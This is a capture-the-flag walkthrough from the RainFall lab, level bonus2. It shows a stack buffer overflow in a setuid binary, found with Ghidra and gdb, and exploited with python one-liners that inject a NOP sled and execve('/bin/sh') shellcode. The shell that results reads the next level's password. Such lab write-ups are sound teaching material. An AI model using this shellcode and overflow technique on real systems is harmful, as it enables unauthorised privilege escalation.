gbrochar
/
RainFall
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
RainFall/bonus2/walkthrough

41 lines
1.8 KiB
Plaintext
Raw Permalink Blame History

Using ghidra we notice LANG env variable is exploited and can be either fi, nl, or something else, defaulting to english. It calls a greeting function and uses both arguments. We'll set it to nl for now.
Fiddling a bit we can make the program segfault, and can make it segfault at any address
```
Starting program: /home/user/bonus2/bonus2 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAAAAAA aaaaaaaaaaaaaaaaaaaaaaaXXXX
Goedemiddag! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaaaaaaaaaaaaaaaaaaaaaaaXXXX
Program received signal SIGSEGV, Segmentation fault.
0x58585858 in ?? ()
(gdb)
```
let's try to put a shellcode after the x.
We find the argv in the stack at address 0xbffff8c0.
our 'X's are at address 0xbffff919.
let's put our shellcode at 0xbffff920. That's 3 characters between the addresses and the shellcode.
it makes a strange behavior but doesn't work.
```
bonus2@RainFall:~$ LANG=nl /home/user/bonus2/bonus2 `python -c "print('A'*40)"` `python -c "print('a'*23+'\x20\xf9\xff\xbf'+'a'*3+'\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68')"`
bonus2@RainFall:~$
```
let's try putting the shellcode in the first argument
```
bonus2@RainFall:~$ LANG=nl /home/user/bonus2/bonus2 `python -c "print('\x90'*100+'\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68')"` `python -c "print('a'*23+'\xe0\xf8\xff\xbf')"`
Goedemiddag! <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>aaaaaaaaaaaaaaaaaaaaaaa<61><61><EFBFBD><EFBFBD>
$ whoami
bonus3
$ cat /home/user/bonus3/.pass
71d449df0f960b36e0055eb58c14d0f5d0ddc0b35328d657f91cf0df15910587
```
:)
Reference in New Issue View Git Blame Copy Permalink